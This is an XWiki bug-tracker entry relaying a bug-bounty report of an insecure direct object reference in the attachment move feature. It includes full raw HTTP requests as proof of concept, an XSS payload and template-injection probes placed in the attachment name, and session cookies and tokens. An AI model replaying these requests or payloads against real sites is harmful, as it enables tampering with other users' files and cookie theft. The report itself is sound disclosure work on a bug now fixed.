Details
-
Bug
-
Resolution: Fixed
-
Blocker
-
14.0-rc-1
-
Unit
-
Unknown
-
N/A
-
N/A
-
Description
SUBMISSION REFERENCES
- Submission code: XWIKI-WT6D3WYY
- Submission URL: https://www.intigriti.com/auth/dashboard?redirect=/submissions/e95a7ad5-7029-4627-abf0-3e3e3ea0b4ce/XWIKI-WT6D3WYY
RESEARCHER INFORMATION
- Submitter: bruhbey
SUBMISSION INFORMATION
- Created at: Thu, 03 Nov 2022 07:44:56 GMT
- Submission status: Archived
REPORT CONTENT
- Severity: High (8.1)
- Domain: https://intigriti.xwiki.com/ (Url)
- Proof of concept: Hey
Summary:
- IDOR on move documents
Steps:
- create 2 accounts
- login your first account,go to your profile and upload an attachment
- then go to your second account and upload an attachment
- try to move your attachment (from second account)
first request :
GET /xwiki/bin/view/XWiki/bruhboyi?xpage=attachment%2Fmove&attachment=xwiki%3AXWiki.bruhboyi%40%24%7B2*2%7D%24%7B%7B2*2%7D%7D%7B2*2%7D%7B%7B2*2%7D%7D%3Cimg%20src%3DA%20onerror%3Dalert%28document.cookie%29%3E.pdf HTTP/1.1
Host: intigriti.xwiki.com
Connection: close
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="100", "Google Chrome";v="100"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://intigriti.xwiki.com/xwiki/bin/view/XWiki/bruhboyi
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: JSESSIONID=F1F2C6CBB4D4E0FAB1C64749BB732229; username="9c0MhyM7A8TTVVq3M3evqg_"; password="3zG4GTGXE6KBpi89DD8rzA_"; rememberme="false"; validation="71a1f21d8049f98419c88f6fc42fd5b5"
- you have to change attachment parameter
Second request :
POST /xwiki/bin/view/XWiki/bruhboyi?xpage=attachment/move&step=2 HTTP/1.1
Host: intigriti.xwiki.com
Connection: close
Content-Length: 444
Cache-Control: max-age=0
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="100", "Google Chrome";v="100"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: https://intigriti.xwiki.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://intigriti.xwiki.com/xwiki/bin/view/XWiki/bruhboyi?xpage=attachment%2Fmove&attachment=xwiki%3AXWiki.bruhboyi%40%24%7B2*2%7D%24%7B%7B2*2%7D%7D%7B2*2%7D%7B%7B2*2%7D%7D%3Cimg%20src%3DA%20onerror%3Dalert%28document.cookie%29%3E.pdf
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: JSESSIONID=F1F2C6CBB4D4E0FAB1C64749BB732229; username="9c0MhyM7A8TTVVq3M3evqg_"; password="3zG4GTGXE6KBpi89DD8rzA_"; rememberme="false"; validation="71a1f21d8049f98419c88f6fc42fd5b5"
form_token=wkm7S5aStrzL0zJFDbt1YA&async=true&sourceLocation=xwiki%3AXWiki.bruhboyi&sourceAttachmentName=%24%7B2*2%7D%24%7B%7B2*2%7D%7D%7B2*2%7D%7B%7B2*2%7D%7D%3Cimg+src%3DA+onerror%3Dalert%28document.cookie%29%3E.pdf&updateReferences=true&updateReferences=false&autoRedirect=false&targetAttachmentName=%24%7B2*2%7D%24%7B%7B2*2%7D%7D%7B2*2%7D%7B%7B2*2%7D%7D%3Cimg+src%3DA+onerror%3Dalert%28document.cookie%29%3E.pdf&targetLocation=XWiki.bruhboyi
- you can simply change sourceLocation and sourceAttachmentName to reproduce issue
I added poc video
Thanks
- Impact: IDOR
- Personal data involved: No
- Endpoint: https://intigriti.xwiki.com/xwiki/bin/view/XWiki/<username>?xpage=attachment/move&step=2
- Type: Insecure Direct Object Reference
- Attachments: No attachments available
Attachments
Issue Links
- links to